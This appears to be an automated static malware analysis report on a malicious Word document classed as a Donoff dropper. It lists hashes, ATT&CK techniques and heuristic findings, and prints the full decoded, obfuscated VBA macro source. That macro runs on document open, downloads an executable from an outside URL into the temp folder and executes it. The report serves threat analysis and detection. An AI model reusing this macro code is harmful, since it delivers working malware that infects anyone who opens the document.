Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c23433c795daf5b1…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 82.5 KB
Created: 2016-05-12 23:07:00
Authoring application: Microsoft Office Word
First seen: 2017-12-09
MD5: f8c69d16676de9fd8303d12f4e4545e8
SHA-1: 275e2a6cbcc0893e3a2919a9fd5fe217d232a1c2
SHA-256: c23433c795daf5b1db047756c994fdc3c2b5c0354e7b743ee98046bff612a9ff
Risk score: 330

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro that executes upon opening the document. This macro utilizes `CreateObject("WScript.Shell")` and `Shell()` calls, indicating an intent to run external commands or scripts. The presence of `WScript.Shell` usage and `Document_Open` macro firings strongly suggests a downloader or dropper functionality, likely fetching and executing a secondary payload. The ClamAV detection of 'Doc.Dropper.Donoff-5743530-0' further supports this dropper classification.

Heuristics (10)

  • ClamAV: Doc.Dropper.Donoff-5743530-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected [medium, 5 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • WScript.Shell usage [critical] (OLE_VBA_WSCRIPT)
    Matched lines in script:
      Dim GYPPhgwSJI As Boolean, FxaIym As String
      Set QIeYwGQcDT = CreateObject("WScript.Shell")
      End Function
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    Matched lines in script:
      Dim GYPPhgwSJI As Boolean, FxaIym As String
      Set QIeYwGQcDT = CreateObject("WScript.Shell")
      End Function
  • CallByName call [high] (OLE_VBA_CALLBYNAME)
    Matched lines in script:
      Public Sub JBGqPB(ByVal JRstc As Integer, ByVal yfRxWaL As Object, ByVal vwIihNHwRg As String)
      CallByName yfRxWaL, vwIihNHwRg, 1
      End Sub
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low] (OLE_VBA_DOCOPEN)
    Matched lines in script:
      End Sub
      Private Sub Document_Open()
      Dim rayiAM As Boolean
  • Reference to Windows Script Host [high] (SC_STR_WSCRIPT)
  • Suspicious extracted artifact [medium] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
      • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
      • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
      • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
      • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
      • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8685 bytes
SHA-256: 1c23a46288108a13cf6f10958bcb1ee11ef9e25ccabdd5c7f7880e2e128d3026
Detection: ClamAV: No threats found
Obfuscation or payload: likely (142 of 219 identifiers look randomly generated, e.g. 'ReXsGOpoqnOsOeqBGOoqdyG', consistent with name-mangling obfuscation)

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub WYdZurj(ByVal nUPyPDdceo As String, ByVal TPRpbPmQCS As String)
wHTiRT
If mjspzU(9002, 675, "ZslO") Then
jGxNa True, "qVEIN", "dYuq"
QwNZHX
tmRfIVJh 807
End If
End Sub
Private Sub pqGeLr(ByVal DfeiPY As Integer)
YoQROe 280, "rEm", 3880
nSBNYIEqi
szgGkotf 3197, "s7cGX", True
End Sub
Private Sub Document_Open()
Dim rayiAM As Boolean
ziCyGtLhET.tEuAnmnNoX
End Sub
Private Sub lWyprRWv()
mqxGfUKgzi 6499, "JiAz", "h0jWb"
MmaltzrlX 1715
If hBTkqIt("") Then
rRoMb
Else
yqyGeqxn
End If
End Sub
Private Function JZUPIUj() As String
yhlAeROGu
JZUPIUj = "IX6wT"
End Function

Attribute VB_Name = "HBSZwovgJ"
Private Sub kNtGZ(ByVal wKkcxXjA As Boolean, ByVal qGtxzruvA As Integer)
JdrgwQ
End Sub
Public Function QIeYwGQcDT() As Object
Dim GYPPhgwSJI As Boolean, FxaIym As String
Set QIeYwGQcDT = CreateObject("WScript.Shell")
End Function
Public Function xOEKtLwVn() As Object
Set xOEKtLwVn = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Private Sub gJYxp()
If euVWF Then
EqgCajclK 1379, False, "3b3t4"
End If
End Sub
Private Sub TYdqFrJ(ByVal vPiqaehkDU As String)
rwKYqDFg True, 2503
End Sub
Public Function MMFNY() As Object
Dim TAtuyTiY As Boolean
Set MMFNY = CreateObject("ADODB.Stream")
End Function
Private Function jqnkUUK() As Integer
scmBSvpTk 2792
lJSsRbNCDs
jTPYG 698, True
upFcL "tfzt", "MT", 3231
jqnkUUK = 5750
End Function

Attribute VB_Name = "knodiW"
Public Function xDoszvxfJ(ByVal oQueYF As Integer, ByVal nyOGqE As Integer, ByVal wgQCT As String, ByVal phBpFKg As String) As String
Dim STjqUuQx As Integer, PsDspeSF As Integer
xDoszvxfJ = Mid(phBpFKg, oQueYF, 1)
End Function
Private Sub BNaEHg(ByVal zGXTd As Integer, ByVal TqsaoB As String)
BkMTwPAnUV "2aaR", 5936
vVjYXg 5637
If LYvcZvEUHc Then
ZkAFSHcy
RYUrsdm True
aVgAUZYDE 8658, "lqc", "RiKq"
End If
nnWkkdeYWI "fH3q", "9kA", False
tvremm "2Za", "eej89", True
End Sub
Public Function NRSYHMIx(ByVal QkQiSpG As Integer, ByVal xFAMLNG As Boolean, ByVal QYvmLrB As String, ByVal cEOct As String) As String
NRSYHMIx = cEOct & QYvmLrB
End Function
Public Function fUwaMiNol(ByVal ySfnfgt As String, ByVal bazlEjPf As String) As Boolean
Dim naWyzQDkE As Integer
fUwaMiNol = InStr(1, bazlEjPf, ySfnfgt)
End Function

Attribute VB_Name = "tirUirwi"
Private Function sRGXI(ByVal UiDLFqDMy As Boolean, ByVal lvuJZD As String) As Boolean
aAnoEkmH
TYWXT
SIYNpFH
If bIFLsWSDYA Then
sjrIRNel
pIxxnGPm True, 5648
Else
oRDnv
GIOdryBDU
End If
sRGXI = False
End Function
Public Function OThwuG(ByVal rkxaUcqY As String, ByVal nMlOzdDx As String) As String
Dim OjWyjKn As Boolean
Dim BdLPTw As String
crcNfikH = "hAox"
For RTVIyfIss = 1 To Len(rkxaUcqY)
OjWyjKn = knodiW.fUwaMiNol(knodiW.xDoszvxfJ(RTVIyfIss, 5243, pVgDS, rkxaUcqY), nMlOzdDx)
If Not OjWyjKn Then
OThwuG = knodiW.NRSYHMIx(2102, True, knodiW.xDoszvxfJ(RTVIyfIss, 5243, pVgDS, rkxaUcqY), OThwuG)
fitPL = ""
End If
Next
End Function
Private Function rfPVXXPon() As Integer
ngHBnhTd 5855, 1524
UimfM
kCujVAMx
If zXmQhJr Then
vMylTY
ROzIu
End If
rfPVXXPon = 5758
End Function
Private Function pVgDS() As String
pVgDS = "Q5m"
End Function

Attribute VB_Name = "ziCyGtLhET"
Private Function oRyMOuK(ByVal BaLAefKDY As String, ByVal vHzzGv As String) As String
Dim VcSZuhfau As Integer
Set aGTjzuX = zivWxP.dcKBLbGs(SAcpVcW, HBSZwovgJ.QIeYwGQcDT, tirUirwi.OThwuG("P3RAWOVCVES3VS", ".A3VW"))
oRyMOuK = aGTjzuX(BaLAefKDY)
End Function
Private Function yxnGhEe() As String
yxnGhEe = tirUirwi.OThwuG("OYp4eCnC", "CY4 ")
End Function
Private Function SAcpVcW() As String
SAcpVcW = tirUirwi.OThwuG("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX")
End Function
Private Function xgiYagx() As String
xgiYagx = "1FaH"
End Function
Private Sub hfZqCeGBC(ByVal qaFAJ As String, ByVal QhYhbt As String)
Set zYVIGSsck = HBSZwovgJ.xOEKtLwVn
zivWxP.mAcTRLD ejEmLhof, tirUirwi.OThwuG("OYp4eCnC", "CY4 "), qaFAJ, zYVIGSsck, False
zivWxP.AgrPU tirUirwi.OThwuG("UJsJJerj-JJAjgJeJnGt", "GJj"), vaDCWQGexY, 2963, tirUirwi.OThwuG("MQCoJzXilgClYaX/C4C.g0 C(CXcoXmYYpYatYiQbgYlYe;C)g", "YJXQCg"), LEhcc, zYVIGSsck
zivWxP.JBGqPB 1177, zYVIGSsck, HCFxEEPND
ZWBbn True, 6317, QhYhbt, zivWxP.LRpuX(LEhcc, LgDWFy, zYVIGSsck)
End Sub
Private Function LgDWFy() As String
LgDWFy = tirUirwi.OThwuG(".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO")
End Function
Private Sub EiLevE()
Dim cIPEyduG As Integer
OIRUtHf = True
On Error GoTo xeSTzm
zIxdob = False
hfZqCeGBC wnEiH, gRFLC
SeYuJBojru gRFLC
Exit Sub
xeSTzm:
End Sub
Private Function gRFLC() As String
Dim YNmOHLMBF As Integer, hIKrUpMu As Integer
gRFLC = oRyMOuK(tirUirwi.OThwuG("ZTEUMZsP", "9cZUsX"), "nf") & oycrPfMb
End Function
Private Function TGGrY() As String
TGGrY = tirUirwi.OThwuG("nTyHpaeB", "HBaqXn")
End Function
Private Function oycrPfMb() As String
Dim YvsChVwYth As Integer
Dim AkGou As Integer
JJNlxuFaS = True
oycrPfMb = tsIVRe
End Function
Private Sub SeYuJBojru(ByVal ONtWMv As String)
zivWxP.YVjBqrLyxJ "if", HBSZwovgJ.QIeYwGQcDT, 7188, ONtWMv, tirUirwi.OThwuG("kEx2eI1c", "k31IG2")
End Sub
Private Function LEhcc() As String
LEhcc = "D9k"
End Function
Public Sub tEuAnmnNoX()
Dim JhZBmFQNK As Integer
Dim qKwvGumloC As Boolean
kZsag = 4121
EiLevE
End Sub
Private Function FzmIedRZZ() As String
FzmIedRZZ = tirUirwi.OThwuG("YClm/o/s0e", "0dY/m")
End Function
Private Function wnEiH() As String
Dim JSZINyhSId As Integer
wnEiH = tirUirwi.OThwuG("ThtDt pTB:S/T/fTSprBDe z. cT o m/BsDyD stD emB/DBcSa cThe /SBw orDdS.SeTBx e", "SDB T")
End Function
Private Sub ZWBbn(ByVal jdVfKLEFHy As Boolean, ByVal IsBrj As Integer, ByVal Gmumxvrhz As String, ByVal SOOqWKdo As Variant)
Dim oNKsSMFTa As Boolean
Dim MhlcMtb As Integer
Set urROlotAH = HBSZwovgJ.MMFNY
zivWxP.HPdra True, 1, urROlotAH, TGGrY
zivWxP.JBGqPB 1177, urROlotAH, yxnGhEe
uRUxACPwrk = 5904
zivWxP.YVjBqrLyxJ xgiYagx, urROlotAH, 7188, SOOqWKdo, tirUirwi.OThwuG("Wbbribtzek", "Zzlmkb")
sIbLjqP = "Gn"
zivWxP.AgrPU Gmumxvrhz, pqTTm, 2963, 2, xgiYagx, urROlotAH
zivWxP.JBGqPB 1177, urROlotAH, FzmIedRZZ
End Sub
Private Function ejEmLhof() As String
XBoKEL = False
ejEmLhof = tirUirwi.OThwuG("G.E TB", ".BA ")
End Function
Private Function pqTTm() As String
pqTTm = tirUirwi.OThwuG("pSraUvremToVUFimlVed", "mprdUV")
End Function
Private Function tsIVRe() As String
tsIVRe = tirUirwi.OThwuG("O/7vOeiav6O62vJ32vvamf.OJexiOe", "OivJm")
End Function
Private Function vaDCWQGexY() As String
vaDCWQGexY = tirUirwi.OThwuG("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp")
End Function
Private Function HCFxEEPND() As String
HCFxEEPND = tirUirwi.OThwuG("SIerIndr", "MIrG")
End Function

Attribute VB_Name = "zivWxP"
Private Sub avcEIXr(ByVal DWTDS As Boolean, ByVal gDjVCb As Integer)
QzYClH "Ukt", 8941, "Ox"
End Sub
Public Sub JBGqPB(ByVal JRstc As Integer, ByVal yfRxWaL As Object, ByVal vwIihNHwRg As String)
CallByName yfRxWaL, vwIihNHwRg, 1
End Sub
Public Sub mAcTRLD(ByVal hyqvEXT As Variant, ByVal CyPNNcqPO As String, ByVal YGjItzV As Variant, ByVal foEFRfqWkY As Object, ByVal jtkSk As Variant)
IXNhTW = ""
CallByName foEFRfqWkY, CyPNNcqPO, 1, hyqvEXT, YGjItzV, jtkSk
End Sub
Public Function dcKBLbGs(ByVal ePoyCQ As String, ByVal VLtxeUpieQ As Object, ByVal MjhGLIcf As String) As Variant
Dim MXLUhG As Integer, bAmMXC As Integer
Set dcKBLbGs = CallByName(VLtxeUpieQ, ePoyCQ, 2, MjhGLIcf)
End Function
Public Sub AgrPU(ByVal IamjGclJY As Variant, ByVal mcmyHmAzvJ As String, ByVal McFGHaA As Integer, ByVal CmMeWqlkaz As Variant, ByVal qFoYKWTNs As String, ByVal fppFJG As Object)
CallByName fppFJG, mcmyHmAzvJ, 1, IamjGclJY, CmMeWqlkaz
End Sub
Public Sub HPdra(ByVal scsvvzFw As Boolean, ByVal EuVYIFH As Variant, ByVal TlFLzFt As Object, ByVal vzncfc As String)
CallByName TlFLzFt, vzncfc, 4, EuVYIFH
End Sub
Private Sub sfZFfFZ(ByVal nkXhelbfd As Integer, ByVal wFlNFy As Integer)
VYZRTX ""
FaPULoVT 5592, "040", ""
End Sub
Public Sub YVjBqrLyxJ(ByVal FRfgBCc As String, ByVal BoSBIxdpy As Object, ByVal vNgbfey As Integer, ByVal rvSbIsAIn As Variant, ByVal kuIPQRiG As String)
CallByName BoSBIxdpy, kuIPQRiG, 1, rvSbIsAIn
End Sub
Public Function LRpuX(ByVal wyKQFiqrlm As String, ByVal lDGcCyNh As String, ByVal iJhLFwZOdT As Object) As Variant
Dim RSTyzqKRy As Integer, UNYDxtaaT As Boolean
LRpuX = CallByName(iJhLFwZOdT, lDGcCyNh, 2)
End Function